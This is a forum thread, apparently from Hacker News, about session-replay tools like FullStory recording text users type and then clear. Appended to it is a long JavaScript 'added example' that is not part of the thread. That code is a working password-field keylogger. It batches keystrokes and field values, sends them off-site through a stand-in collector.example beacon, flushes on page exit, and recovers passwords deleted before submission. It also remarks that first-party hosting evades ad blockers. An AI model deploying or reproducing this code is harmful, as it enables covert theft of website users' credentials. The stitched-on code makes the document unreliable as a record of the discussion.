by nja 1648 days ago
I used to think this, until I happened across FullStory. With that tool you can replay a website visitor's exact session as if it was recorded live on video -- everything they typed (even if it was cleared and never sent in a request), where/when clicks happened, the contents and response of every request, etc.

As a backend engineer, I had no idea that frontend monitoring was this advanced, but apparently it is. So now we all have to be extra paranoid, because _any_ website could be using this tool to "spy" on everybody.

Of course, it _was_ very helpful to us in tracking down some issues (ever tried to tell a customer how to send you a HAR?). And I assume that operating with an adblocker and blocking nonessential cookies will prevent or hamper the output for us more technical types. Even so...

1 comment

> everything they typed (even if it was cleared and never sent in a request)

Okay, wow, that sounds rough... so in a way, phishing attacks don't even require you to log in anymore, just typing the password or maybe 75% of it is enough to get you.

That's not new, is it? You could always have an onchange/oninput handler on the login fields and send it to your server.
Back when Facebook made their huge update to convert to a one-page-app, it was pretty obvious they were doing this because on tenuous connections the interactions with the text would be very strange, as if they are caching your text and operating on it server-side using commands sent from client-side.
Uhh... yeah, just typing the password (or letting your password manager autofill when you get cache poisoned or whatever) has always been enough to get you. onkeydown has existed longer than phishing.
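The capture mechanism the two replies above describe (an `oninput` handler on the login fields shipping values to a server, and `onkeydown` doing the same for individual keys), written out as an added example. This is not code from the thread or from any product named in it; `KeystrokeRecorder`, `attachToForm`, `recoverFields` and the constructed "hunter2" scenario are all assumptions of this example, and the `transport` callback stands in for something like `navigator.sendBeacon`. The recording logic is kept separate from the DOM wiring so the interesting part, recovering a value that was typed, deleted and never submitted, can be run outside a browser.

```javascript
// Added example, not code from the thread or from any product it names.
// The recording logic is separated from the DOM wiring so it can be run and
// checked outside a browser; attachToForm() shows the browser side.

class KeystrokeRecorder {
  // `transport` is whatever ships a batch off-site, e.g.
  // (b) => navigator.sendBeacon("https://collector.example/e", JSON.stringify(b))
  constructor(transport, { flushEvery = 4 } = {}) {
    this.transport = transport;
    this.flushEvery = flushEvery;
    this.buffer = [];
  }

  // One `input` event: the field's full current value after the edit.
  onInput(field, value, now = Date.now()) {
    this.record({ t: now, field, type: "input", value });
  }

  // One `keydown` event: the key itself, before it changes the field.
  onKeyDown(field, key, now = Date.now()) {
    this.record({ t: now, field, type: "keydown", key });
  }

  record(event) {
    this.buffer.push(event);
    if (this.buffer.length >= this.flushEvery) this.flush();
  }

  // Ship whatever is buffered; called on the size threshold and on page hide.
  flush() {
    if (this.buffer.length === 0) return;
    const batch = this.buffer;
    this.buffer = [];
    this.transport(batch);
  }
}

// Browser wiring (not executed in this file). `input` fires for typing, paste
// and, in current browsers, password-manager autofill; `keydown` also sees keys
// that never change the value (Backspace, Ctrl+A). Flushing on `pagehide` means
// clearing the field or closing the tab does not lose what was already seen.
function attachToForm(form, recorder) {
  form.addEventListener("input", (e) =>
    recorder.onInput(e.target.name, e.target.value));
  form.addEventListener("keydown", (e) =>
    recorder.onKeyDown(e.target.name, e.key));
  window.addEventListener("pagehide", () => recorder.flush());
}

// Collector side of the same idea: from the received batches, keep the longest
// value ever observed per field. A value typed and then deleted before submit
// is still in there; no request to the login endpoint was needed.
function recoverFields(batches) {
  const best = new Map();
  for (const batch of batches) {
    for (const ev of batch) {
      if (ev.type !== "input") continue;
      const cur = best.get(ev.field) || "";
      if (ev.value.length > cur.length) best.set(ev.field, ev.value);
    }
  }
  return best;
}

// Constructed scenario (sample input for this example): a user types "hunter2"
// into the password field, thinks better of it, selects all and deletes it,
// then leaves without submitting.
function simulateAbandonedLogin() {
  const received = [];
  const rec = new KeystrokeRecorder((batch) => received.push(batch), { flushEvery: 4 });
  const typed = "hunter2";
  let t = 1000;
  for (let i = 1; i <= typed.length; i++) {
    rec.onKeyDown("password", typed[i - 1], t);       // key goes down ...
    rec.onInput("password", typed.slice(0, i), t + 1); // ... field now holds prefix
    t += 120;
  }
  rec.onKeyDown("password", "a", t);            // Ctrl+A: selection only, no input event
  rec.onKeyDown("password", "Backspace", t + 1);
  rec.onInput("password", "", t + 2);           // field is now empty
  rec.flush();                                  // what the pagehide handler would do
  return {
    finalFieldValue: "",
    batches: received.length,
    events: received.flat().length,
    recovered: recoverFields(received).get("password"),
  };
}
```

With `flushEvery` at 4, the scenario ships five batches (17 events) and the collector reconstructs `hunter2` even though the field was empty when the user left. The practical points for the defender side of the thread: an ad blocker only helps if the script is served from a domain on a blocklist, a first-party-hosted copy is not, and a password manager filling the field raises the same `input` event as typing does.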